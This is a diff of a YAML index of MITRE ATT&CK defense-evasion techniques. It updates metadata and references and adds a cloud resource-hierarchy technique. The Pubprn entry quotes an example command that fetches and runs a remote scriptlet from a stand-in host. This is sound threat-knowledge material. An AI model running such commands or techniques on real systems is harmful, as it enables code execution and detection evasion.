+      - source_name: Man Pam_Unix
+        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+          25, 2020.
+        url: https://linux.die.net/man/8/pam_unix
+      - source_name: PAM Creds
+        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+          PAM backdoors & DNS requests. Retrieved June 26, 2020.
+        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+      - source_name: Red Hat PAM
+        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+          (PAM). Retrieved June 25, 2020.
+        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+      - source_name: PAM Backdoor
+        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+          25, 2020.
+        url: https://github.com/zephrax/linux-pam-backdoor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.003
     atomic_tests: []
   T1578.004:
@@ -518,7 +537,7 @@ defense-evasion:
         url: https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots
         description: Google. (2019, October 7). Restoring and deleting persistent
           disk snapshots. Retrieved October 8, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-03-08T10:33:02.128Z'
       name: Revert Cloud Instance
       description: |-
         An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.
@@ -545,8 +564,6 @@ defense-evasion:
       - 'Instance: Instance Modification'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1564.012:
     technique:
@@ -588,7 +605,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1222.002:
     technique:
@@ -666,7 +682,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1222.002
     atomic_tests: []
   T1216.001:
@@ -703,7 +718,7 @@ defense-evasion:
         Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second <code>script:</code> parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is <code>pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct</code>. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
 
         In later versions of Windows (10+), <code>PubPrn.vbs</code> has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to <code>LDAP://</code>, vice the <code>script:</code> moniker which could be used to reference remote code via HTTP(S).
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-18T14:55:35.817Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Signed Script Proxy Execution: Pubprn'
       x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -722,7 +737,6 @@ defense-evasion:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1216.001
     atomic_tests: []
   T1574.007:
@@ -812,7 +826,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1006:
     technique:
@@ -870,12 +883,87 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1006
     atomic_tests: []
+  T1666:
+    technique:
+      modified: '2024-09-25T16:15:41.224Z'
+      name: Modify Cloud Resource Hierarchy
+      description: "Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service
+        (IaaS) environments in order to evade defenses.  \n\nIaaS environments often
+        group resources into a hierarchy, enabling improved resource management and
+        application of policies to relevant groups. Hierarchical structures differ
+        among cloud providers. For example, in AWS environments, multiple accounts
+        can be grouped under a single organization, while in Azure environments, multiple
+        subscriptions can be grouped under a single management group.(Citation: AWS
+        Organizations)(Citation: Microsoft Azure Resources)\n\nAdversaries may add,
+        delete, or otherwise modify resource groups within an IaaS hierarchy. For
+        example, in Azure environments, an adversary who has gained access to a Global
+        Administrator account may create new subscriptions in which to deploy resources.
+        They may also engage in subscription hijacking by transferring an existing
+        pay-as-you-go subscription from a victim tenant to an adversary-controlled
+        tenant. This will allow the adversary to use the victim’s compute resources
+        without generating logs on the victim tenant.(Citation: Microsoft Peach Sandstorm
+        2023)(Citation: Microsoft Subscription Hijacking 2022)\n\nIn AWS environments,
+        adversaries with appropriate permissions in a given account may call the `LeaveOrganization`
+        API, causing the account to be severed from the AWS Organization to which
+        it was tied and removing any Service Control Policies, guardrails, or restrictions
+        imposed upon it by its former Organization. Alternatively, adversaries may
+        call the `CreateAccount` API in order to create a new account within an AWS
+        Organization. This account will use the same payment methods registered to
+        the payment account but may not be subject to existing detections or Service
+        Control Policies.(Citation: AWS RE:Inforce Threat Detection 2024)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Modification'
+      type: attack-pattern
+      id: attack-pattern--0ce73446-8722-4086-9d43-514f1d0f669e
+      created: '2024-09-25T14:16:19.234Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1666
+        external_id: T1666
+      - source_name: AWS Organizations
+        description: AWS. (n.d.). Terminology and concepts for AWS Organizations.
+          Retrieved September 25, 2024.
+        url: https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+      - source_name: Microsoft Subscription Hijacking 2022
+        description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
+          using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
+        url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
+      - source_name: Microsoft Azure Resources
+        description: Microsoft Azure. (2024, May 31). Organize your Azure resources
+          effectively. Retrieved September 25, 2024.
+        url: https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-setup-guide/organize-resources
+      - source_name: Microsoft Peach Sandstorm 2023
+        description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
+          password spray campaigns enable intelligence collection at high-value targets.
+          Retrieved September 18, 2023.
+        url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1564.008:
     technique:
-      modified: '2023-10-16T16:41:53.957Z'
+      modified: '2024-10-15T15:56:27.592Z'
       name: 'Hide Artifacts: Email Hiding Rules'
       description: |-
         Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the <code>New-InboxRule</code> or <code>Set-InboxRule</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)
@@ -901,11 +989,10 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -950,12 +1037,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.008
     atomic_tests: []
   T1027.013:
     technique:
-      modified: '2024-04-19T04:03:07.164Z'
+      modified: '2024-10-15T16:32:45.108Z'
       name: Encrypted/Encoded File
       description: "Adversaries may encrypt or encode files to obfuscate strings,
         bytes, and other specific patterns to impede detection. Encrypting and/or
@@ -1026,11 +1112,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1014:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:50.568Z'
       name: Rootkit
       description: "Adversaries may use rootkits to hide the presence of programs,
         files, network connections, services, drivers, and other system components.
@@ -1098,7 +1183,6 @@ defense-evasion:
         url: https://en.wikipedia.org/wiki/Rootkit
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1014
     atomic_tests: []
   T1036.007:
@@ -1129,7 +1213,7 @@ defense-evasion:
         url: https://www.seqrite.com/blog/how-to-avoid-dual-attack-and-vulnerable-files-with-double-extension/
         description: Seqrite. (n.d.). How to avoid dual attack and vulnerable files
           with double extension?. Retrieved July 27, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-14T21:09:59.588Z'
       name: 'Masquerading: Double File Extension'
       description: "Adversaries may abuse a double extension in the filename as a
         means of masquerading the true file type. A file name may include a secondary
@@ -1166,13 +1250,11 @@ defense-evasion:
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'File: File Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1036.007
     atomic_tests: []
   T1548.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:35:39.112Z'
       name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
       description: |-
         Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -1273,7 +1355,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.002
     atomic_tests: []
   T1548.003:
@@ -1304,7 +1385,7 @@ defense-evasion:
         description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
           Does. Retrieved March 19, 2018.
         source_name: cybereason osx proton
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-14T16:28:19.781Z'
       name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
       description: |-
         Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -1338,13 +1419,11 @@ defense-evasion:
       - User
       x_mitre_effective_permissions:
       - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1548.003
     atomic_tests: []
   T1578:
     technique:
-      modified: '2023-09-05T20:45:22.041Z'
+      modified: '2024-09-30T13:28:37.414Z'
       name: Modify Cloud Compute Infrastructure
       description: |-
         An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.
@@ -1396,12 +1475,11 @@ defense-evasion:
       - source_name: Mandiant M-Trends 2020
         description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
           2020.
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1542.001:
     technique:
@@ -1481,12 +1559,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1542.001
     atomic_tests: []
   T1574.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:42:48.016Z'
       name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -1505,7 +1582,6 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Matthew Demaske, Adaptforward
@@ -1519,7 +1595,6 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -1546,8 +1621,8 @@ defense-evasion:
         external_id: T1574.011
       - source_name: Tweet Registry Perms Weakness
         description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
-          April 9, 2018."
-        url: https://twitter.com/r0wdy_/status/936365549553991680
+          September 12, 2024."
+        url: https://x.com/r0wdy_/status/936365549553991680
       - source_name: insecure_reg_perms
         description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
           Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -1578,7 +1653,8 @@ defense-evasion:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.011
     atomic_tests: []
   T1542.003:
@@ -1635,7 +1711,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1218.013:
     technique:
@@ -1688,7 +1763,7 @@ defense-evasion:
         PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER</code>). This command would
         inject an import table entry consisting of the specified DLL into the module
         at the given base address.(Citation: Mavinject Functionality Deconstructed)"
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T17:35:08.315Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Mavinject
       x_mitre_detection: |-
@@ -1704,11 +1779,10 @@ defense-evasion:
       - 'Process: Process Creation'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.005:
     technique:
-      modified: '2023-09-14T21:12:48.409Z'
+      modified: '2024-09-12T19:30:45.064Z'
       name: 'Masquerading: Match Legitimate Name or Location'
       description: |-
         Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
@@ -1754,8 +1828,8 @@ defense-evasion:
         external_id: T1036.005
       - source_name: Twitter ItsReallyNick Masquerading Update
         description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
-          Retrieved April 22, 2019.
-        url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/1055321652777619457
       - source_name: Docker Images
         description: Docker. (n.d.). Docker Images. Retrieved April 6, 2021.
         url: https://docs.docker.com/engine/reference/commandline/images/
@@ -1765,9 +1839,8 @@ defense-evasion:
         url: https://www.elastic.co/blog/how-hunt-masquerade-ball
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036.005
     atomic_tests: []
   T1600:
@@ -1794,7 +1867,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T22:37:49.258Z'
       name: Weaken Encryption
       description: |-
         Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)
@@ -1818,8 +1891,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1036.008:
     technique:
@@ -1883,11 +1954,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564:
     technique:
-      modified: '2024-03-29T17:45:48.126Z'
+      modified: '2024-10-15T15:58:49.815Z'
       name: Hide Artifacts
       description: |-
         Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)
@@ -1908,8 +1978,8 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Metadata'
       - 'Application Log: Application Log Content'
@@ -1953,12 +2023,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564
     atomic_tests: []
   T1484.002:
     technique:
-      modified: '2024-04-19T04:27:51.388Z'
+      modified: '2024-09-25T13:50:11.593Z'
       name: Domain Trust Modification
       description: "Adversaries may add new domain trusts, modify the properties of
         existing domain trusts, or otherwise change the configuration of trust relationships
@@ -1978,9 +2047,14 @@ defense-evasion:
         trust modifications such as altering the claim issuance rules to log in any
         valid set of credentials as a specified user.(Citation: AADInternals zure
         AD Federated Domain) \n\nAn adversary may also add a new federated identity
-        provider to an identity tenant such as Okta, which may enable the adversary
-        to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
-        2023)"
+        provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+        may enable the adversary to authenticate as any user of the tenant.(Citation:
+        Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+        gain broad access into a variety of cloud-based services that leverage the
+        identity tenant. For example, in AWS environments, an adversary that creates
+        a new identity provider for an AWS Organization will be able to federate into
+        all of the AWS Organization member accounts without creating identities for
+        each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -2000,9 +2074,8 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '2.0'
+      - Identity Provider
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -2019,6 +2092,10 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1484/002
         external_id: T1484.002
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
       - source_name: CISA SolarWinds Cloud Detection
         description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
           in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -2052,7 +2129,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.002
     atomic_tests: []
   T1562.009:
@@ -2102,7 +2178,7 @@ defense-evasion:
         url: https://docs.microsoft.com/windows-server/administration/windows-commands/bootcfg
         description: Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August
           30, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-31T14:51:47.352Z'
       name: 'Impair Defenses: Safe Boot Mode'
       description: |-
         Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)
@@ -2130,8 +2206,6 @@ defense-evasion:
       - Anti-virus
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1562.009
     atomic_tests: []
   T1542.005:
@@ -2174,7 +2248,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
           Information. Retrieved October 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T16:35:53.806Z'
       name: TFTP Boot
       description: |-
         Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -2198,12 +2272,10 @@ defense-evasion:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1497.001:
     technique:
-      modified: '2024-04-19T12:49:40.919Z'
+      modified: '2024-09-12T15:50:18.047Z'
       name: 'Virtualization/Sandbox Evasion: System Checks'
       description: "Adversaries may employ various system checks to detect and avoid
         virtualization and analysis environments. This may include changing behaviors
@@ -2293,13 +2365,12 @@ defense-evasion:
         url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
       - source_name: Deloitte Environment Awareness
         description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1497.001
     atomic_tests: []
   T1070.002:
@@ -2323,7 +2394,7 @@ defense-evasion:
         url: https://www.eurovps.com/blog/important-linux-log-files-you-must-be-monitoring/
         description: Marcel. (2018, April 19). 12 Critical Linux Log Files You Must
           be Monitoring. Retrieved March 29, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-29T21:23:51.886Z'
       name: 'Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs'
       description: |
         Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the <code>/var/log/</code> directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)
@@ -2348,8 +2419,6 @@ defense-evasion:
       - 'File: File Deletion'
       - 'File: File Modification'
       - 'Command: Command Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1070.002
     atomic_tests: []
   T1218.004:
@@ -2378,7 +2447,7 @@ defense-evasion:
       - source_name: LOLBAS Installutil
         url: https://lolbas-project.github.io/lolbas/Binaries/Installutil/
         description: LOLBAS. (n.d.). Installutil.exe. Retrieved July 31, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:47:52.603Z'
       name: 'Signed Binary Proxy Execution: InstallUtil'
       description: |-
         Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: <code>C:\Windows\Microsoft.NET\Framework\v<version>\InstallUtil.exe</code> and <code>C:\Windows\Microsoft.NET\Framework64\v<version>\InstallUtil.exe</code>.
@@ -2404,8 +2473,6 @@ defense-evasion:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.004
     atomic_tests: []
   T1027.008:
@@ -2457,18 +2524,17 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.001:
     technique:
-      modified: '2024-04-18T22:54:54.668Z'
+      modified: '2024-09-30T17:32:59.948Z'
       name: 'Hijack Execution Flow: DLL Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
 
